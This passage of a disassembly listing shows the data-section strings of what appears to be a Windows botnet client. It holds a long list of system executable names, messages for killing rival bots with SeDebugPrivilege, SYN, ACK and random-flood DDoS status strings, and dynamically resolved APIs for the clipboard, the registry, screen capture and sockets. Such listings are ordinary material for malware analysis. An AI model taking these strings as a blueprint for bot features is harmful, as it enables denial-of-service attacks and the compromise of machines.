aMstsc_exe db 'mstsc.exe',0 ; DATA XREF: .data:0041F3B8�o
align 4
aNarrator_exe db 'narrator.exe',0 ; DATA XREF: .data:0041F3BC�o
align 4
aNbtstat_exe db 'nbtstat.exe',0 ; DATA XREF: .data:0041F3C0�o
aNddeapir_exe db 'nddeapir.exe',0 ; DATA XREF: .data:0041F3C4�o
align 4
aNerocheck_exe db 'NeroCheck.exe',0 ; DATA XREF: .data:0041F3C8�o
align 4
aNet_exe db 'net.exe',0 ; DATA XREF: .data:0041F3CC�o
aNet1_exe db 'net1.exe',0 ; DATA XREF: .data:0041F3D0�o
align 4
aNetdde_exe db 'netdde.exe',0 ; DATA XREF: .data:0041F3D4�o
align 4
aNetsetup_exe db 'netsetup.exe',0 ; DATA XREF: .data:0041F3D8�o
align 4
aNetsh_exe db 'netsh.exe',0 ; DATA XREF: .data:0041F3DC�o
align 4
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: .data:0041F3E0�o
aNlsfunc_exe db 'nlsfunc.exe',0 ; DATA XREF: .data:0041F3E4�o
aNotepad_exe db 'notepad.exe',0 ; DATA XREF: .data:0041F3E8�o
aNslookup_exe db 'nslookup.exe',0 ; DATA XREF: .data:0041F3EC�o
align 4
aNtbackup_exe db 'ntbackup.exe',0 ; DATA XREF: .data:0041F3F0�o
align 4
aNtkrnlpa_exe db 'ntkrnlpa.exe',0 ; DATA XREF: .data:0041F3F4�o
align 4
aNtoskrnl_exe db 'ntoskrnl.exe',0 ; DATA XREF: .data:0041F3F8�o
align 4
aNtsd_exe db 'ntsd.exe',0 ; DATA XREF: .data:0041F3FC�o
align 4
aNtvdm_exe db 'ntvdm.exe',0 ; DATA XREF: .data:0041F400�o
align 10h
aNw16_exe db 'nw16.exe',0 ; DATA XREF: .data:0041F404�o
align 4
aNwscript_exe db 'nwscript.exe',0 ; DATA XREF: .data:0041F408�o
align 4
aOdbcad32_exe db 'odbcad32.exe',0 ; DATA XREF: .data:0041F40C�o
align 4
aOdbcconf_exe db 'odbcconf.exe',0 ; DATA XREF: .data:0041F410�o
align 4
aOpenfiles_exe db 'openfiles.exe',0 ; DATA XREF: .data:0041F414�o
align 4
aOsk_exe db 'osk.exe',0 ; DATA XREF: .data:0041F418�o
aOsuninst_exe db 'osuninst.exe',0 ; DATA XREF: .data:0041F41C�o
align 4
aPackager_exe db 'packager.exe',0 ; DATA XREF: .data:0041F420�o
align 4
aPathping_exe db 'pathping.exe',0 ; DATA XREF: .data:0041F424�o
align 4
aPentnt_exe db 'pentnt.exe',0 ; DATA XREF: .data:0041F428�o
align 10h
aPerfmon_exe db 'perfmon.exe',0 ; DATA XREF: .data:0041F42C�o
aPing_exe db 'ping.exe',0 ; DATA XREF: .data:0041F430�o
align 4
aPing6_exe db 'ping6.exe',0 ; DATA XREF: .data:0041F434�o
align 4
aPowercfg_exe db 'powercfg.exe',0 ; DATA XREF: .data:0041F438�o
align 4
aPrint_exe db 'print.exe',0 ; DATA XREF: .data:0041F43C�o
align 10h
aProgman_exe db 'progman.exe',0 ; DATA XREF: .data:0041F440�o
aProquota_exe db 'proquota.exe',0 ; DATA XREF: .data:0041F444�o
align 4
aProxycfg_exe db 'proxycfg.exe',0 ; DATA XREF: .data:0041F448�o
align 4
aQappsrv_exe db 'qappsrv.exe',0 ; DATA XREF: .data:0041F44C�o
aQprocess_exe db 'qprocess.exe',0 ; DATA XREF: .data:0041F450�o
align 4
aQwinsta_exe db 'qwinsta.exe',0 ; DATA XREF: .data:0041F454�o
aRasautou_exe db 'rasautou.exe',0 ; DATA XREF: .data:0041F458�o
align 4
aRasdial_exe db 'rasdial.exe',0 ; DATA XREF: .data:0041F45C�o
aRasphone_exe db 'rasphone.exe',0 ; DATA XREF: .data:0041F460�o
align 10h
aRcimlby_exe db 'rcimlby.exe',0 ; DATA XREF: .data:0041F464�o
aRcp_exe db 'rcp.exe',0 ; DATA XREF: .data:0041F468�o
aRdpclip_exe db 'rdpclip.exe',0 ; DATA XREF: .data:0041F46C�o
aRdsaddin_exe db 'rdsaddin.exe',0 ; DATA XREF: .data:0041F470�o
align 10h
aRdshost_exe db 'rdshost.exe',0 ; DATA XREF: .data:0041F474�o
aRecover_exe db 'recover.exe',0 ; DATA XREF: .data:0041F478�o
aRedir_exe db 'redir.exe',0 ; DATA XREF: .data:0041F47C�o
align 4
aReg_exe db 'reg.exe',0 ; DATA XREF: .data:0041F480�o
aRegcladm_exe db 'REGCLADM.EXE',0 ; DATA XREF: .data:0041F484�o
align 4
aRegedt32_exe db 'regedt32.exe',0 ; DATA XREF: .data:0041F488�o
align 4
aRegini_exe db 'regini.exe',0 ; DATA XREF: .data:0041F48C�o
align 4
aRegsvr32_exe db 'regsvr32.exe',0 ; DATA XREF: .data:0041F490�o
align 4
aRegwiz_exe db 'regwiz.exe',0 ; DATA XREF: .data:0041F494�o
align 4
aRelog_exe db 'relog.exe',0 ; DATA XREF: .data:0041F498�o
align 10h
aReplace_exe db 'replace.exe',0 ; DATA XREF: .data:0041F49C�o
aReset_exe db 'reset.exe',0 ; DATA XREF: .data:0041F4A0�o
align 4
aRexec_exe db 'rexec.exe',0 ; DATA XREF: .data:0041F4A4�o
align 4
aRoute_exe db 'route.exe',0 ; DATA XREF: .data:0041F4A8�o
align 10h
aRoutemon_exe db 'routemon.exe',0 ; DATA XREF: .data:0041F4AC�o
align 10h
aRsh_exe db 'rsh.exe',0 ; DATA XREF: .data:0041F4B0�o
aRsm_exe db 'rsm.exe',0 ; DATA XREF: .data:0041F4B4�o
aRsmsink_exe db 'rsmsink.exe',0 ; DATA XREF: .data:0041F4B8�o
aRsmui_exe db 'rsmui.exe',0 ; DATA XREF: .data:0041F4BC�o
align 4
aRsnotify_exe db 'rsnotify.exe',0 ; DATA XREF: .data:0041F4C0�o
align 4
aRsopprov_exe db 'rsopprov.exe',0 ; DATA XREF: .data:0041F4C4�o
align 4
aRsvp_exe db 'rsvp.exe',0 ; DATA XREF: .data:0041F4C8�o
align 4
aRtcshare_exe db 'rtcshare.exe',0 ; DATA XREF: .data:0041F4CC�o
align 4
aRtlcpl_exe db 'RTLCPL.EXE',0 ; DATA XREF: .data:0041F4D0�o
align 10h
aRunas_exe db 'runas.exe',0 ; DATA XREF: .data:0041F4D4�o
align 4
aRundll32_exe db 'rundll32.exe',0 ; DATA XREF: .data:0041F4D8�o
align 4
aRunonce_exe db 'runonce.exe',0 ; DATA XREF: .data:0041F4DC�o
aRwinsta_exe db 'rwinsta.exe',0 ; DATA XREF: .data:0041F4E0�o
aSavedump_exe db 'savedump.exe',0 ; DATA XREF: .data:0041F4E4�o
align 4
aSc_exe db 'sc.exe',0 ; DATA XREF: .data:0041F4E8�o
align 4
aScardsvr_exe db 'scardsvr.exe',0 ; DATA XREF: .data:0041F4EC�o
align 4
aSchtasks_exe db 'schtasks.exe',0 ; DATA XREF: .data:0041F4F0�o
align 4
aSdbinst_exe db 'sdbinst.exe',0 ; DATA XREF: .data:0041F4F4�o
aSecedit_exe db 'secedit.exe',0 ; DATA XREF: .data:0041F4F8�o
aServices_exe db 'services.exe',0 ; DATA XREF: .data:0041F4FC�o
align 4
aSessmgr_exe db 'sessmgr.exe',0 ; DATA XREF: .data:0041F500�o
aSethc_exe db 'sethc.exe',0 ; DATA XREF: .data:0041F504�o
align 4
aSetup_exe db 'setup.exe',0 ; DATA XREF: .data:0041F508�o
align 4
aSetver_exe db 'setver.exe',0 ; DATA XREF: .data:0041F50C�o
align 4
aSfc_exe db 'sfc.exe',0 ; DATA XREF: .data:0041F510�o
aShadow_exe db 'shadow.exe',0 ; DATA XREF: .data:0041F514�o
align 4
aShare_exe db 'share.exe',0 ; DATA XREF: .data:0041F518�o
align 4
aShmgrate_exe db 'shmgrate.exe',0 ; DATA XREF: .data:0041F51C�o
align 4
aShrpubw_exe db 'shrpubw.exe',0 ; DATA XREF: .data:0041F520�o
aShutdown_exe db 'shutdown.exe',0 ; DATA XREF: .data:0041F524�o
align 10h
aSigverif_exe db 'sigverif.exe',0 ; DATA XREF: .data:0041F528�o
align 10h
aSkeys_exe db 'skeys.exe',0 ; DATA XREF: .data:0041F52C�o
align 4
aSmbinst_exe db 'smbinst.exe',0 ; DATA XREF: .data:0041F530�o
aSmlogsvc_exe db 'smlogsvc.exe',0 ; DATA XREF: .data:0041F534�o
align 4
aSmss_exe db 'smss.exe',0 ; DATA XREF: .data:0041F538�o
align 4
aSndrec32_exe db 'sndrec32.exe',0 ; DATA XREF: .data:0041F53C�o
align 4
aSndvol32_exe db 'sndvol32.exe',0 ; DATA XREF: .data:0041F540�o
align 4
aSol_exe db 'sol.exe',0 ; DATA XREF: .data:0041F544�o
aSort_exe db 'sort.exe',0 ; DATA XREF: .data:0041F548�o
align 4
aSpider_exe db 'spider.exe',0 ; DATA XREF: .data:0041F54C�o
align 4
aSpiisupd_exe db 'spiisupd.exe',0 ; DATA XREF: .data:0041F550�o
align 4
aSpnpinst_exe db 'spnpinst.exe',0 ; DATA XREF: .data:0041F554�o
align 4
aSpoolsv_exe db 'spoolsv.exe',0 ; DATA XREF: .data:0041F558�o
aSprestrt_exe db 'sprestrt.exe',0 ; DATA XREF: .data:0041F55C�o
align 10h
aSpupdsvc_exe db 'spupdsvc.exe',0 ; DATA XREF: .data:0041F560�o
align 10h
aStimon_exe db 'stimon.exe',0 ; DATA XREF: .data:0041F564�o
align 4
aSubrange_uce db 'subrange.uce',0 ; DATA XREF: .data:0041F568�o
align 4
aSubst_exe db 'subst.exe',0 ; DATA XREF: .data:0041F56C�o
align 4
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: .data:0041F570�o
aSyncapp_exe db 'syncapp.exe',0 ; DATA XREF: .data:0041F574�o
aSysedit_exe db 'sysedit.exe',0 ; DATA XREF: .data:0041F578�o
aSyskey_exe db 'syskey.exe',0 ; DATA XREF: .data:0041F57C�o
align 4
aSysocmgr_exe db 'sysocmgr.exe',0 ; DATA XREF: .data:0041F580�o
align 4
aSysteminfo_exe db 'systeminfo.exe',0 ; DATA XREF: .data:0041F584�o
align 4
aSystray_exe db 'systray.exe',0 ; DATA XREF: .data:0041F588�o
aTaskkill_exe db 'taskkill.exe',0 ; DATA XREF: .data:0041F58C�o
align 4
aTasklist_exe db 'tasklist.exe',0 ; DATA XREF: .data:0041F590�o
align 4
aTaskman_exe db 'taskman.exe',0 ; DATA XREF: .data:0041F594�o
aTaskmgr_exe db 'taskmgr.exe',0 ; DATA XREF: .data:0041F598�o
aTcmsetup_exe db 'tcmsetup.exe',0 ; DATA XREF: .data:0041F59C�o
align 4
aTcpsvcs_exe db 'tcpsvcs.exe',0 ; DATA XREF: .data:0041F5A0�o
aTelnet_exe db 'telnet.exe',0 ; DATA XREF: .data:0041F5A4�o
align 4
aTftp_exe db 'tftp.exe',0 ; DATA XREF: .data:0041F5A8�o
align 10h
aTlntadmn_exe db 'tlntadmn.exe',0 ; DATA XREF: .data:0041F5AC�o
align 10h
aTlntsess_exe db 'tlntsess.exe',0 ; DATA XREF: .data:0041F5B0�o
align 10h
aTlntsvr_exe db 'tlntsvr.exe',0 ; DATA XREF: .data:0041F5B4�o
aTourstart_exe db 'tourstart.exe',0 ; DATA XREF: .data:0041F5B8�o
align 4
aTracerpt_exe db 'tracerpt.exe',0 ; DATA XREF: .data:0041F5BC�o
align 4
aTracert_exe db 'tracert.exe',0 ; DATA XREF: .data:0041F5C0�o
aTracert6_exe db 'tracert6.exe',0 ; DATA XREF: .data:0041F5C4�o
align 4
aTscon_exe db 'tscon.exe',0 ; DATA XREF: .data:0041F5C8�o
align 4
aTscupgrd_exe db 'tscupgrd.exe',0 ; DATA XREF: .data:0041F5CC�o
align 4
aTsdiscon_exe db 'tsdiscon.exe',0 ; DATA XREF: .data:0041F5D0�o
align 4
aTskill_exe db 'tskill.exe',0 ; DATA XREF: .data:0041F5D4�o
align 10h
aTsshutdn_exe db 'tsshutdn.exe',0 ; DATA XREF: .data:0041F5D8�o
align 10h
aTypeperf_exe db 'typeperf.exe',0 ; DATA XREF: .data:0041F5DC�o
align 10h
aUnlodctr_exe db 'unlodctr.exe',0 ; DATA XREF: .data:0041F5E0�o
align 10h
aUpnpcont_exe db 'upnpcont.exe',0 ; DATA XREF: .data:0041F5E4�o
align 10h
aUps_exe db 'ups.exe',0 ; DATA XREF: .data:0041F5E8�o
aUser_exe db 'user.exe',0 ; DATA XREF: .data:0041F5EC�o
align 4
aUserinit_exe db 'userinit.exe',0 ; DATA XREF: .data:0041F5F0�o
align 4
aUsrmlnka_exe db 'usrmlnka.exe',0 ; DATA XREF: .data:0041F5F4�o
align 4
aUsrprbda_exe db 'usrprbda.exe',0 ; DATA XREF: .data:0041F5F8�o
align 4
aUsrshuta_exe db 'usrshuta.exe',0 ; DATA XREF: .data:0041F5FC�o
align 4
aUtilman_exe db 'utilman.exe',0 ; DATA XREF: .data:0041F600�o
aVerclsid_exe db 'verclsid.exe',0 ; DATA XREF: .data:0041F604�o
align 10h
aVerifier_exe db 'verifier.exe',0 ; DATA XREF: .data:0041F608�o
align 10h
aViral_exe db 'viral.exe',0 ; DATA XREF: .data:0041F60C�o
align 4
aVssadmin_exe db 'vssadmin.exe',0 ; DATA XREF: .data:0041F610�o
align 4
aVssvc_exe db 'vssvc.exe',0 ; DATA XREF: .data:0041F614�o
align 4
aVwipxspx_exe db 'vwipxspx.exe',0 ; DATA XREF: .data:0041F618�o
align 4
aW32tm_exe db 'w32tm.exe',0 ; DATA XREF: .data:0041F61C�o
align 4
aWextract_exe db 'wextract.exe',0 ; DATA XREF: .data:0041F620�o
align 4
aWiaacmgr_exe db 'wiaacmgr.exe',0 ; DATA XREF: .data:0041F624�o
align 4
aWinchat_exe db 'winchat.exe',0 ; DATA XREF: .data:0041F628�o
aWindbver_exe db 'WINDBVER.EXE',0 ; DATA XREF: .data:0041F62C�o
align 10h
aWinhlp32_exe db 'winhlp32.exe',0 ; DATA XREF: .data:0041F630�o
align 10h
aWinlogon_exe db 'winlogon.exe',0 ; DATA XREF: .data:0041F634�o
align 10h
aWinmine_exe db 'winmine.exe',0 ; DATA XREF: .data:0041F638�o
aWinmsd_exe db 'winmsd.exe',0 ; DATA XREF: .data:0041F63C�o
align 4
aWinspool_exe db 'winspool.exe',0 ; DATA XREF: .data:0041F640�o
align 4
aWinver_exe db 'winver.exe',0 ; DATA XREF: .data:0041F644�o
align 4
aWjview_exe db 'wjview.exe',0 ; DATA XREF: .data:0041F648�o
align 10h
aWowdeb_exe db 'wowdeb.exe',0 ; DATA XREF: .data:0041F64C�o
align 4
aWowexec_exe db 'wowexec.exe',0 ; DATA XREF: .data:0041F650�o
aWpabaln_exe db 'wpabaln.exe',0 ; DATA XREF: .data:0041F654�o
aWpnpinst_exe db 'wpnpinst.exe',0 ; DATA XREF: .data:0041F658�o
align 4
aWrite_exe db 'write.exe',0 ; DATA XREF: .data:0041F65C�o
align 10h
aWscntfy_exe db 'wscntfy.exe',0 ; DATA XREF: .data:0041F660�o
aWscript_exe db 'wscript.exe',0 ; DATA XREF: .data:0041F664�o
aWuauclt_exe db 'wuauclt.exe',0 ; DATA XREF: .data:0041F668�o
aWuauclt1_exe db 'wuauclt1.exe',0 ; DATA XREF: .data:0041F66C�o
align 4
aWupdmgr_exe db 'wupdmgr.exe',0 ; DATA XREF: .data:0041F670�o
aXcopy_exe db 'xcopy.exe',0 ; DATA XREF: .data:0041F674�o
align 4
aAcdsee_scr db 'ACDSee.scr',0 ; DATA XREF: .data:0041F678�o
align 4
aLogon_scr db 'logon.scr',0 ; DATA XREF: .data:0041F67C�o
align 4
aScrnsave_scr db 'scrnsave.scr',0 ; DATA XREF: .data:0041F680�o
align 4
aSeismosaver_sc db 'SeismoSaver.scr',0 ; DATA XREF: .data:0041F684�o
aSs3dfo_scr db 'ss3dfo.scr',0 ; DATA XREF: .data:0041F688�o
align 10h
aSsbezier_scr db 'ssbezier.scr',0 ; DATA XREF: .data:0041F68C�o
align 10h
aSsflwbox_scr db 'ssflwbox.scr',0 ; DATA XREF: .data:0041F690�o
align 10h
aSsmarque_scr db 'ssmarque.scr',0 ; DATA XREF: .data:0041F694�o
align 10h
aSsmypics_scr db 'ssmypics.scr',0 ; DATA XREF: .data:0041F698�o
align 10h
aSsmyst_scr db 'ssmyst.scr',0 ; DATA XREF: .data:0041F69C�o
align 4
aSspipes_scr db 'sspipes.scr',0 ; DATA XREF: .data:0041F6A0�o
aSsstars_scr db 'ssstars.scr',0 ; DATA XREF: .data:0041F6A4�o
aSstext3d_scr db 'sstext3d.scr',0 ; DATA XREF: .data:0041F6A8�o
align 4
aAlcrmv_exe db 'alcrmv.exe',0 ; DATA XREF: .data:off_41F6AC�o
align 10h
aAlcupd_exe db 'alcupd.exe',0 ; DATA XREF: .data:0041F6B0�o
align 4
aExplorer_exe_0 db 'explorer.exe',0 ; DATA XREF: .data:0041F6B4�o
align 4
aHh_exe db 'hh.exe',0 ; DATA XREF: .data:0041F6B8�o
align 4
aIsuninst_exe db 'IsUninst.exe',0 ; DATA XREF: .data:0041F6BC�o
align 4
aIun6002_exe db 'iun6002.exe',0 ; DATA XREF: .data:0041F6C0�o
aNotepad_exe_0 db 'NOTEPAD.EXE',0 ; DATA XREF: .data:0041F6C4�o
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: .data:0041F6C8�o
aRegtlib_exe db 'REGTLIB.EXE',0 ; DATA XREF: .data:0041F6CC�o
aSetdebug_exe db 'setdebug.exe',0 ; DATA XREF: .data:0041F6D0�o
align 4
aSetup1_exe db 'Setup1.exe',0 ; DATA XREF: .data:0041F6D4�o
align 10h
aSoundman_exe db 'SOUNDMAN.EXE',0 ; DATA XREF: .data:0041F6D8�o
align 10h
aSt6unst_exe db 'ST6UNST.EXE',0 ; DATA XREF: .data:0041F6DC�o
aTaskman_exe_0 db 'TASKMAN.EXE',0 ; DATA XREF: .data:0041F6E0�o
aTwunk_16_exe db 'twunk_16.exe',0 ; DATA XREF: .data:0041F6E4�o
align 4
aTwunk_32_exe db 'twunk_32.exe',0 ; DATA XREF: .data:0041F6E8�o
align 4
aWinhelp_exe db 'winhelp.exe',0 ; DATA XREF: .data:0041F6EC�o
aWinhlp32_exe_0 db 'winhlp32.exe',0 ; DATA XREF: .data:0041F6F0�o
align 4
aSystem db 'System',0 ; DATA XREF: .data:0041F6F4�o
align 4
; char aSS_2[]
aSS_2 db '%s\%s',0 ; DATA XREF: sub_405CF2+F�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_405D52+CB�o
align 4
; char aErrorTerminati[]
aErrorTerminati db 'Error terminating: %s (pid: %d)!',0 ; DATA XREF: sub_405D52+222�o
align 4
; char aSS_3[]
aSS_3 db '%s\%s',0 ; DATA XREF: sub_405D52+28A�o
align 4
; char aBotKilledAndRe[]
aBotKilledAndRe db 'Bot killed and removed: %s (pid: %d)!',0 ; DATA XREF: sub_405D52+317�o
align 4
; char aCanNotDeleteSP[]
aCanNotDeleteSP db 'Can not delete: %s (pid: %d)!',0 ; DATA XREF: sub_405D52+33A�o
align 4
; char aErrorTermina_0[]
aErrorTermina_0 db 'Error terminating: %s (pid: %d)!',0 ; DATA XREF: sub_405D52+443�o
align 10h
; char aSS_4[]
aSS_4 db '%s\%s',0 ; DATA XREF: sub_405D52+4AB�o
align 4
; char aBotKilledAnd_0[]
aBotKilledAnd_0 db 'Bot killed and removed: %s (pid: %d)!',0 ; DATA XREF: sub_405D52+538�o
align 10h
; char aCanNotDelete_0[]
aCanNotDelete_0 db 'Can not delete: %s (pid: %d)!',0 ; DATA XREF: sub_405D52+55B�o
align 10h
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_405D52+5B1�o
align 4
; char aYouCantSendPac[]
aYouCantSendPac db 'You cant send packets for 0 seconds.',0 ; DATA XREF: sub_40634F+82�o
align 4
; char aDdosErrorWsada[]
aDdosErrorWsada db '[DDOS] Error WSAData.',0 ; DATA XREF: sub_40634F+F2�o
align 4
; char aDdosErrorCalli[]
aDdosErrorCalli db '[DDOS] Error calling socket().',0 ; DATA XREF: sub_40634F+170�o
align 4
; char aDdosErrorCal_0[]
aDdosErrorCal_0 db '[DDOS] Error calling setsockopt(). fWSAGetLastError() returns %d.'
; DATA XREF: sub_40634F+20B�o
db 0
align 4
; char aDdosInvalidTar[]
aDdosInvalidTar db '[DDOS] :Invalid target IP.',0 ; DATA XREF: sub_40634F+291�o
align 4
; char aDdosSendingPac[]
aDdosSendingPac db '[DDOS] :Sending packets to %s...',0 ; DATA XREF: sub_40634F+33C�o
align 4
; char aD_D_D_D_0[]
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_40634F+406�o
; char aDdos_syn[]
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_40634F+4C2�o
align 10h
; char aDdos_ack[]
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_40634F:loc_406835�o
align 4
; char aDdos_random[]
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_40634F:loc_406859�o
; char aDdosErrorSendi[]
aDdosErrorSendi db '[DDOS] :Error sending packets to %s. eax=SOCKET_ERROR, fWSAGetLas'
; DATA XREF: sub_40634F+6A1�o
db 'tError()=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
align 4
; char aDdosFinishedSe[]
aDdosFinishedSe db '[DDOS] :Finished sending packets to %s. Sent %d packet(s). ~%dMB '
; DATA XREF: sub_40634F+75B�o
db 'of data sent (~%dK/s).',0
; char aYouCantSendP_0[]
aYouCantSendP_0 db 'You cant send packets for 0 seconds.',0 ; DATA XREF: sub_406B0C+38�o
align 4
; char aDdosErrorCal_1[]
aDdosErrorCal_1 db '[DDOS] Error calling socket().',0 ; DATA XREF: sub_406B0C+B0�o
align 4
; char aDdosErrorCal_2[]
aDdosErrorCal_2 db '[DDOS] Error calling setsockopt(). fWSAGetLastError() returns %d.'
; DATA XREF: sub_406B0C+145�o
db 0
align 10h
; char aDdosInvalidT_0[]
aDdosInvalidT_0 db '[DDOS] :Invalid target IP.',0 ; DATA XREF: sub_406B0C+1C5�o
align 4
; char aDdosSendingP_0[]
aDdosSendingP_0 db '[DDOS] :Sending packets to %s...',0 ; DATA XREF: sub_406B0C+26A�o
align 10h
; char aD_D_D_D_1[]
aD_D_D_D_1 db '%d.%d.%d.%d',0 ; DATA XREF: sub_406B0C+334�o
; char aDdosErrorSen_0[]
aDdosErrorSen_0 db '[DDOS] :Error sending packets to %s. eax=SOCKET_ERROR, fWSAGetLas'
; DATA XREF: sub_406B0C+465�o
db 'tError()=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
align 10h
; char aDdosFinished_0[]
aDdosFinished_0 db '[DDOS] :Finished sending packets to %s. Sent %d packet(s). ~%dMB '
; DATA XREF: sub_406B0C+51F�o
db 'of data sent (~%dK/s).',0
; char ModuleName[]
ModuleName db 'kernel32.dll',0 ; DATA XREF: sub_407087+6�o
align 4
; char ProcName[]
ProcName db 'SetErrorMode',0 ; DATA XREF: sub_407087+1E�o
align 4
; char aCreatetoolhelp[]
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_407087+31�o
align 4
; char aProcess32first[]
aProcess32first db 'Process32First',0 ; DATA XREF: sub_407087+44�o
align 4
; char aProcess32next[]
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_407087+57�o
align 4
; char aModule32first[]
aModule32first db 'Module32First',0 ; DATA XREF: sub_407087+6A�o
align 4
; char aGetdiskfreespa[]
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_407087+7D�o
; char aGetlogicaldriv[]
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_407087+90�o
; char aGetdrivetypea[]
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_407087+A3�o
align 10h
; char aSearchpatha[]
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_407087+B6�o
; char aQueryperforman[]
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_407087+C9�o
; char aQueryperform_0[]
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_407087+DC�o
align 10h
; char aRegisterservic[]
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_407087:loc_4071DA�o
align 4
; char LibFileName[]
LibFileName db 'user32.dll',0 ; DATA XREF: sub_407087:loc_407217�o
align 4
; char aSendmessagea[]
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_407087+1A8�o
align 4
; char aFindwindowa[]
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_407087+1BB�o
; char aIswindow[]
aIswindow db 'IsWindow',0 ; DATA XREF: sub_407087+1CE�o
align 4
; char aDestroywindow[]
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_407087+1E1�o
align 4
; char aOpenclipboard[]
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_407087+1F4�o
align 4
; char aGetclipboardda[]
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_407087+207�o
align 10h
; char aCloseclipboard[]
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_407087+21A�o
align 10h
; char aExitwindowsex[]
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_407087+22D�o
align 10h
; char aAdvapi32_dll[]
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_407087:loc_407330�o
align 10h
; char aRegopenkeyexa[]
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_407087+2C1�o
align 10h
; char aRegcreatekeyex[]
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_407087+2D4�o
; char aRegsetvalueexa[]
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_407087+2E7�o
align 10h
; char aRegqueryvaluee[]
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_407087+2FA�o
align 4
; char aRegdeletevalue[]
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_407087+30D�o
; char aRegclosekey[]
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_407087+320�o
; char aOpenprocesstok[]
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_407087:loc_4073FA�o
align 4
; char aLookupprivileg[]
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_407087+386�o
align 4
; char aAdjusttokenpri[]
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_407087+399�o
align 4
; char aGetusernamea[]
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_407087:loc_407458�o
align 4
; char aGdi32_dll[]
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_407087:loc_407495�o
align 10h
; char aCreatedca[]
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_407087+426�o
align 4
; char aCreatedibsecti[]
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_407087+439�o
align 10h
; char aCreatecompatib[]
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_407087+44C�o
align 4
; char aGetdevicecaps[]
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_407087+45F�o
align 4
; char aGetdibcolortab[]
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_407087+472�o
align 4
; char aSelectobject[]
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_407087+485�o
align 4
; char aBitblt[]
aBitblt db 'BitBlt',0 ; DATA XREF: sub_407087+498�o
align 10h
; char aDeletedc[]
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_407087+4AB�o
align 4
; char aDeleteobject[]
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_407087+4BE�o
align 4
; char aWs2_32_dll[]
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_407087:loc_4075CA�o
align 4
; char aWsastartup[]
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_407087+55B�o
align 4
; char aWsasocketa[]
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_407087+56E�o
align 10h
; char aWsaasyncselect[]
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_407087+581�o
align 10h
; char a__wsafdisset[]
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_407087+594�o
align 10h
; char aWsaioctl[]
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_407087+5A7�o
align 4
; char aWsagetlasterro[]
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_407087+5BA�o
; char aWsacleanup[]
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_407087+5CD�o
align 4
; char aSocket[]
aSocket db 'socket',0 ; DATA XREF: sub_407087+5E0�o
align 10h
; char aIoctlsocket[]
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_407087+5F3�o
; char aConnect[]
aConnect db 'connect',0 ; DATA XREF: sub_407087+606�o
; char aInet_ntoa[]
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_407087+619�o
align 10h
; char aInet_addr[]
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_407087+62C�o
align 4
; char aHtons[]
aHtons db 'htons',0 ; DATA XREF: sub_407087+63F�o
align 4
; char aHtonl[]
aHtonl db 'htonl',0 ; DATA XREF: sub_407087+652�o
align 4
; char aNtohs[]
aNtohs db 'ntohs',0 ; DATA XREF: sub_407087+665�o
align 4
; char aNtohl[]
aNtohl db 'ntohl',0 ; DATA XREF: sub_407087+678�o
align 4
; char aSend[]
aSend db 'send',0 ; DATA XREF: sub_407087+68B�o
align 4
